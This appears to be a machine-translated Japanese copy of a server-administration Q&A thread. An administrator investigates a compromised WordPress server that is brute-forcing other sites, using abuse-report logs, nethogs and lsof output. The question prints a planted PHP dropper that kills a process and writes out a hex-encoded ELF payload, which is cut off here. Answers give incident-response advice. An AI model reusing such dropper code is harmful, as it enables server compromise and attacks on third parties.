web-dev-qa-db-ja.com

誰かが私のサーバーを悪用していますが、どうすれば悪用を止めることができますか?

私は仮想化されたWebサーバーの束の初心者のシステム管理者です。最近、サーバーの1つが「ブルートフォース」攻撃に使用されているという電子メールを受け取りました。メールの内容は以下のとおりです。

ご挨拶、

/ somehost /乱用チームは、共有ホスティングサーバー/somehost/.ru/ip-number /のJoomla/WordPressコントロールパネルに対して、ネットワークからIPアドレス/ myから大量のブルートフォース攻撃を試みたことをお知らせします。 -IPアドレス/

過去30分間に、次のような1500回の試行を記録しました。

/ my-ip-address// their-domain /-[12/Jan/2014:13:29:05 +0400] "POST /wp-login.php HTTP/1.0" 200 3170 "-" "-"

/ my-ip-address// their-domain /-[12/Jan/2014:13:29:05 +0400] "POST /wp-login.php HTTP/1.0" 200 3170 "-" "-"

/ my-ip-address// their-domain /-[12/Jan/2014:13:29:05 +0400] "POST /wp-login.php HTTP/1.0" 200 3170 "-" "-"

/ my-ip-address// their-domain /-[12/Jan/2014:13:29:06 +0400] "POST /wp-login.php HTTP/1.0" 200 3170 "-" "-"

/ my-ip-address// their-domain /-[12/Jan/2014:13:29:06 +0400] "POST /wp-login.php HTTP/1.0" 200 3170 "-" "-"

このサーバー(/some-Host/.ru)[/their-ip/]で以前に記録されたこの試行の総数:

====

このメッセージは、/ some-company-name /セキュリティシステムによって自動的に送信されました。パブリックWhoIsサービスから取得したYor電子メールアドレス。このメッセージを誤って受け取ってしまった場合は、ご迷惑をおかけして申し訳ありません。あなたの電子メールがこのIPアドレスまたはネットワークに関連していない場合は、お問い合わせください。

====

ありがとう、/ somehost /虐待チーム

http:///somehost/dot ru

/ロシアのいくつかの電話番号/、

/ロシアの連絡先データ/

  • このメールについてどう思いますか?これは、無視してはならない詐欺または重要なメッセージですか?

「wp-login.php」がWordPressのPHPスクリプトであることがログで明らかにわかるのに、彼らが「Joomla/Wordpress」と書いているのは奇妙だと思います。

私たちのサーバーでは、Webmin/Virtualminを介していくつかのWordPressブログと、外部からアクセスできないSquidサーバーをホストしています。

iftopnethogsのトラフィックをしばらく観察しましたが、疑わしいものは何も見えません。イカのアクセスログは私には普通のようです。

「安全な」ログでサーバーにログインしようとする試みがたくさん見られますが、アクセスを得るためにサーバーを管理している人は誰もいません。

セキュアからの次のダンプを参照してください。

an 12 02:35:19 /server/ saslauthd[2186]: pam_unix(smtp:auth): check pass; user unknown
Jan 12 02:35:19 /server/ saslauthd[2186]: pam_unix(smtp:auth): authentication failure; logname= uid=0 euid=0 tty= ruser= rhost=
Jan 12 02:35:19 /server/ saslauthd[2186]: pam_succeed_if(smtp:auth): error retrieving information about user thomas

そしてもう一つ。

Jan 12 03:00:29 /server/ sshd[21948]: Invalid user anton from 109.7.72.130
Jan 12 03:00:29 /server/ sshd[21949]: input_userauth_request: invalid user anton
Jan 12 03:00:29 /server/ sshd[21948]: pam_unix(sshd:auth): check pass; user unknown
Jan 12 03:00:29 /server/ sshd[21948]: pam_unix(sshd:auth): authentication failure; logname= uid=0 euid=0 tty=ssh ruser= rhost=130.72.7.109.rev.sfr.net
Jan 12 03:00:29 /server/ sshd[21948]: pam_succeed_if(sshd:auth): error retrieving information about user anton
Jan 12 03:00:32 /server/ sshd[21948]: Failed password for invalid user anton from 109.7.72.130 port 40925 ssh2
Jan 12 03:00:32 /server/ sshd[21949]: Received disconnect from 109.7.72.130: 11: Bye Bye

「who」を使用すると、SSH経由でログインしているのは自分だけであることがはっきりとわかります。

今日、私はすべてのWebminおよびVirtualminモジュールとSquidを最新バージョンに更新しました。

  • 何をするべきだろう?サーバーが攻撃に使用されないように保護するための次のステップは何ですか?
  • それも必要ですか?
  • どのログファイルまたは構成を変更/確認する必要がありますか?

編集:

私が今までやったこと:

  • 攻撃日に変更されたファイル(プロバイダーによると、IP上でほぼ50GBのトラフィックがあった)をfind / -type f -name "*" -newermt 2014-01-12 ! -newermt 2014-01-12 > out.logで確認しました。何も変わっていません。
  • すべてのドメインについてAWStatsを確認しました。 AWStatsによると、1つのドメインでさえ40MBを超えて移管されていません。
  • WordPressは攻撃の日に最新でした。
  • すべてのWebminおよびVirtualminモジュールを更新しました。
  • Squidを更新し、そのポートを3128以外に変更しました。「安全な」ポートとして80、443、21のみを残しました。
  • Fail2banを更新しました。

侵害されたサーバーに対処するにはどうすればよいですか? で提案されているように、サーバーをインターネットから切断したくありません。私たちのデータはバックアップされているので、現在安全です。しかし、何が攻撃を引き起こしたのかを知りたいのですが、それでもそれを達成することはできません。

2014年1月15日編集:

nethogsを使用すると、/usr/bin/Hostが予想よりもはるかに多くのデータを送受信していることがわかりました。

NetHogs version 0.8.0

  PID USER     PROGRAM                                                                                                 DEV        SENT      RECEIVED
10267 /domain//usr/bin/Host                                                                                           eth0     120.571     791.124 KB/sec
30517 /domain/sshd: /domain/@pts/0                                                                                  eth0       2.177       0.111 KB/sec
?     root     /ip-address/:39586-119.247.224.98:80                                                                             0.000       0.000 KB/sec
?     root     /ip-address/:55718-69.163.148.232:80                                                                             0.000       0.000 KB/sec
?     root     /ip-address/:38474-184.154.230.15:80                                                                             0.000       0.000 KB/sec
?     root     /ip-address/:46593-66.7.212.199:80                                                                               0.000       0.000 KB/sec
?     root     /ip-address/:58733-202.232.144.194:80                                                                            0.000       0.000 KB/sec
?     root     /ip-address/:41154-83.170.122.1:80                                                                               0.000       0.000 KB/sec
?     root     /ip-address/:39996-98.129.229.146:80                                                                             0.000       0.000 KB/sec
?     root     /ip-address/:39872-98.129.229.146:80                                                                             0.000       0.000 KB/sec
?     root     /ip-address/:37429-144.76.15.247:80                                                                              0.000       0.000 KB/sec
?     root     /ip-address/:35063-216.12.197.226:80                                                                             0.000       0.000 KB/sec
?     root     /ip-address/:51335-153.120.33.64:80                                                                              0.000       0.000 KB/sec
?     root     /ip-address/:58344-64.207.178.120:80                                                                             0.000       0.000 KB/sec
?     root     /ip-address/:55848-69.163.148.232:80                                                                             0.000       0.000 KB/sec
?     root     /ip-address/:46799-66.7.212.199:80                                                                               0.000       0.000 KB/sec
?     root     /ip-address/:38110-66.155.9.238:80                                                                               0.000       0.000 KB/sec
?     root     /ip-address/:39713-76.74.254.120:80                                                                              0.000       0.000 KB/sec
?     root     /ip-address/:33814-209.217.227.30:80                                                                             0.000       0.000 KB/sec
?     root     /ip-address/:41009-212.113.141.212:80                                                                            0.000       0.000 KB/sec
?     root     /ip-address/:57027-173.11.110.117:80                                                                             0.000       0.000 KB/sec
?     root     /ip-address/:45436-83.222.250.186:80                                                                             0.000       0.000 KB/sec
?     root     /ip-address/:59143-202.232.144.194:80                                                                            0.000       0.000 KB/sec
?     root     /ip-address/:43357-217.9.42.182:80                                                                               0.000       0.000 KB/sec
?     root     /ip-address/:32981-82.113.145.170:80                                                                             0.000       0.000 KB/sec
?     root     unknown TCP                                                                                                        0.000       0.000 KB/sec

  TOTAL                                                                                                                         122.749     791.235 KB/sec

PIDでlsofを実行すると、WordPressのインストールで問題が発生していることがはっきりとわかります。

[root@/domain/ logs]# lsof | grep 1706
Host       1706 /domain/  cwd       DIR              253,0     4096      10178 /home//domain//public_html/wp-content/themes/twentyeleven
Host       1706 /domain/  rtd       DIR              253,0     4096          2 /
Host       1706 /domain/  txt       REG              253,0   137592    1054438 /usr/bin/Host
host       1706 /domain/  mem       REG              253,0   156928    1178048 /lib64/ld-2.12.so
Host       1706 /domain/  mem       REG              253,0    22536    1178065 /lib64/libdl-2.12.so
Host       1706 /domain/  mem       REG              253,0  1926800    1178057 /lib64/libc-2.12.so
Host       1706 /domain/  mem       REG              253,0   145896    1178061 /lib64/libpthread-2.12.so
Host       1706 /domain/  mem       REG              253,0    91096    1178098 /lib64/libz.so.1.2.3
Host       1706 /domain/  mem       REG              253,0   358560    1051774 /usr/lib64/libisc.so.83.0.3
Host       1706 /domain/  mem       REG              253,0   599384    1178963 /lib64/libm-2.12.so
Host       1706 /domain/  mem       REG              253,0   124624    1178074 /lib64/libselinux.so.1
Host       1706 /domain/  mem       REG              253,0   113952    1178072 /lib64/libresolv-2.12.so
Host       1706 /domain/  mem       REG              253,0  1674840    1050692 /usr/lib64/libdns.so.81.4.1
Host       1706 /domain/  mem       REG              253,0   140568    1051828 /usr/lib64/libisccfg.so.82.0.1
Host       1706 /domain/  mem       REG              253,0    34696    1051827 /usr/lib64/libisccc.so.80.0.0
Host       1706 /domain/  mem       REG              253,0    17256    1178085 /lib64/libcom_err.so.2.1
Host       1706 /domain/  mem       REG              253,0  1953536    1050724 /usr/lib64/libcrypto.so.1.0.1e
Host       1706 /domain/  mem       REG              253,0    12592    1178067 /lib64/libkeyutils.so.1.3
Host       1706 /domain/  mem       REG              253,0    46368    1178081 /lib64/libkrb5support.so.0.1
Host       1706 /domain/  mem       REG              253,0    19016    1178989 /lib64/libcap.so.2.16
Host       1706 /domain/  mem       REG              253,0   944712    1178089 /lib64/libkrb5.so.3.3
Host       1706 /domain/  mem       REG              253,0   177520    1178083 /lib64/libk5crypto.so.3.1
Host       1706 /domain/  mem       REG              253,0   209120    1180550 /lib64/libidn.so.11.6.1
Host       1706 /domain/  mem       REG              253,0   280520    1178096 /lib64/libgssapi_krb5.so.2.2
Host       1706 /domain/  mem       REG              253,0    52944    1051829 /usr/lib64/libbind9.so.80.0.4
Host       1706 /domain/  mem       REG              253,0    75936    1052874 /usr/lib64/liblwres.so.80.0.2
Host       1706 /domain/  mem       REG              253,0    21152    1178987 /lib64/libattr.so.1.1.0
Host       1706 /domain/  mem       REG              253,0  1383368    1051772 /usr/lib64/libxml2.so.2.7.6
Host       1706 /domain/  DEL       REG              253,0                 656 /home//domain//public_html/wp-content/themes/twentyeleven/bruteforce.so
Host       1706 /domain/  mem       REG              253,0    27424    1178071 /lib64/libnss_dns-2.12.so
Host       1706 /domain/  mem       REG              253,0    65928    1178073 /lib64/libnss_files-2.12.so
Host       1706 /domain/  mem       REG              253,0 12582912      11739 /home//domain//public_html/wp-content/themes/twentyeleven/.sd0
Host       1706 /domain/  DEL       REG              253,0                 655 /home//domain//public_html/wp-content/themes/twentyeleven/libworker.so
Host       1706 /domain/    0r      CHR                1,3      0t0       3782 /dev/null
Host       1706 /domain/    1r      CHR                1,3      0t0       3782 /dev/null
Host       1706 /domain/    2r      CHR                1,3      0t0       3782 /dev/null
Host       1706 /domain/    3r      CHR                1,3      0t0       3782 /dev/null
spamd     18546        root  mem       REG              253,0    37000    1317060 /usr/lib64/Perl5/auto/List/Util/Util.so
spamd     18548        root  mem       REG              253,0    37000    1317060 /usr/lib64/Perl5/auto/List/Util/Util.so
spamd     18549        root  mem       REG              253,0    37000    1317060 /usr/lib64/Perl5/auto/List/Util/Util.so

home//domain//public_html/wp-content/themes/twentyeleven/bruteforce.soを確認する必要があります。

2014年1月に変更されたすべてのファイルは、WordPressの標準のTwentyElevenテーマインストールには含まれていません。たとえば、ファイルシステムにファイルを保存するために使用できるinitvsafe.phpというスクリプトがあります。

<?php

header("Content-type: text/plain");

if (! function_exists('file_put_contents')) {
        function file_put_contents($filename, $data) {
                $f = @fopen($filename, 'w');
                if (! $f)
                        return false;
                $bytes = fwrite($f, $data);
                fclose($f);
                return $bytes;
        }
}

@system("killall -9 ".basename("/usr/bin/Host"));

$so32 = "\x7f\x45\x4c\x46\x01\x01\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x03\x00\x03\x00\x01\x00\x00\x00\x54\x0d\x00\x00\x34\x00\x00\x00\x48\x69\x00\x00\x00\x00\x00\x00\x34\x00\x20\x00\x03\x00\x28\x00\x0f\x00\x0c\x00\x01\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\xf0\x60\x00\x00\xf0\x60\x00\x00\x05\x00\x00\x00\x00\x10\x00\x00\x01\x00\x00\x00\xf0\x60\x00\x00\xf0\x70\x00\x00\xf0\x70\x00\x00\xf0\x07\x00\x00\xac\x61\x00\x00\x06\x00\x00\x00\x00\x10\x00\x00\x02\x00\x00\x00\xf0\x60\x00\x00\xf0\x70\x00\x00\xf0\x70\x00\x00\x90\x00\x00\x00\x90\x00\x00\x00\x06\x00\x00\x00\x04\x00\x00\x00\x25\x00\x00\x00\x3c\x00\x00\x00\x21\x00\x00\x00\x31\x00\x00\x00\x18\x00\x00\x00\x00\x00\x00\x00\x08\x00\x00\x00\x00\x00\x00\x00\x30\x00\x00\x00\x07\x00\x00\x00\x00\x00\x00\x00\x2c\x00\x00\x00\x11\x00\x00\x00\x1c\x00\x00\x00\x28\x00\x00\x00\x2f\x00\x00\x00\x3b\x00\x00\x00\x29\x00\x00\x00\x39\x00\x00\x00\x15\x00\x00\x00\x05\x00\x00\x00\x2d\x00\x00\x00\x00\x00\x00\x00\x38\x00\x00\x00\x33\x00\x00\x00\x1b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x24\x00\x00\x00\x00\x00\x00\x00\x32\x00\x00\x00\x1e\x00\x00\x00\x3a\x00\x00\x00\x2a\x00\x00\x00\x34\x00\x00\x00\x36\x00\x00\x00\x23\x00\x00\x00\x0b\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00\x00

...
3
Tony Stark

それはおそらく合法です。 wordpress)と明示的に記載されていない理由は、自動メッセージであるためです。このような攻撃を検出し、ソースの所有者に報告するスクリプトによって自動的に送信されます。

サーバーがハッキングされた場合、攻撃者が最初に行うことは、who、ls、および同様のコマンド用に変更されたバイナリをインストールして、自身のアクティビティを非表示にすることです。そして、ログインの記録をログから削除します。したがって、危険にさらされている可能性があります。 侵害されたサーバーに対処するにはどうすればよいですか? 対処方法について説明します。

ほとんどの場合、SSH経由ではなく、プロキシサーバーとして機能するPHPスクリプト)を介してアクセスできませんでした。すべてのWebサイトに属していないファイルがないか確認してください。アクセスログを確認してください異常なアクティビティについても同様です。wordpress、phpmyadminなどの古い(または最新であるが脆弱性が報告されている)バージョンを確認してください。

4
Grant

Rkhunterが疑わしいものを思いついたかどうかも確認することをお勧めします。本当の問題は、サーバーが危険にさらされると、特にfail2banや他のパッケージにパッチが適用されている場合、証拠(ログ)の一部を別のマシンに移動するだけの場合でも、サーバーをオフラインにする方が安全な場合があることです。 Grantが述べたように、ログがどのトラックもカバーするために改ざん/削除されていないことを確認できないため、最悪の事態を想定してください。

Fail2banログを調べて、異常なものがあるかどうかを確認することもできます。

また、侵害されたシステムを扱っているDebianハンドブックパート14.6をざっと見てみたいと思うかもしれません。

0
Thomas E